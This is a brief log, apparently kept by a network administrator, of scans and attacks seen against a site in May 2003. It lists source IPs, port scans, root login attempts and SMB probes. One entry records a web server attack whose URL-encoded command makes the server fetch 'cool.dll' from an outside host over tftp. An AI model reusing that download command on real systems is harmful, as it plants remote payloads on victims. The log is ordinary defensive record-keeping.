*SHORT* summary of some of the attacks against us for May. 2003

   Just too many scans and not enough to keep the list up all the time
    so some of the more intresting scans, or 1 day samples are here

 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes


2003/05/06-15:27:26.90 154.5.220.205 (aihh53u9y49pj.bc.hsia.telus.net) 1. start of scan of 158 ports on net;
2003/05/06-15:27:26.90 154.5.220.205 (aihh53u9y49pj.bc.hsia.telus.net) 2. try to login as root via telnet, pop, ftp, etc

2003/05/07-17:15:09.17 132.235.220.112 (dhcp-220-112.cns.ohiou.edu) scannet for port 139,445 thru 17:27:39, smb attacks

2003/05/21-23:25:21.22 218.92.168.214 (CHINANET jiangsu province network) attack web server w/ cmd tftp%20-i%20132.235.32.83%20GET%20cool.dll

2003/05/24-22:27:55.37 132.235.30.110 (dhcp-030-110.cns.ohiou.edu) scan net for port 445

2003/05/27-08:41:17.09 132.235.239.79 (dhcp-239-079.cns.ohiou.edu) scannet for ports 445,139
2003/05/27-08:45:52.12 132.235.236.184 (dhcp-236-184.cns.ohiou.edu) scannet for ports 445,139
2003/05/27-16:17:22.65 132.235.237.161 (dhcp-237-161.cns.ohiou.edu) scannet for ports 445,139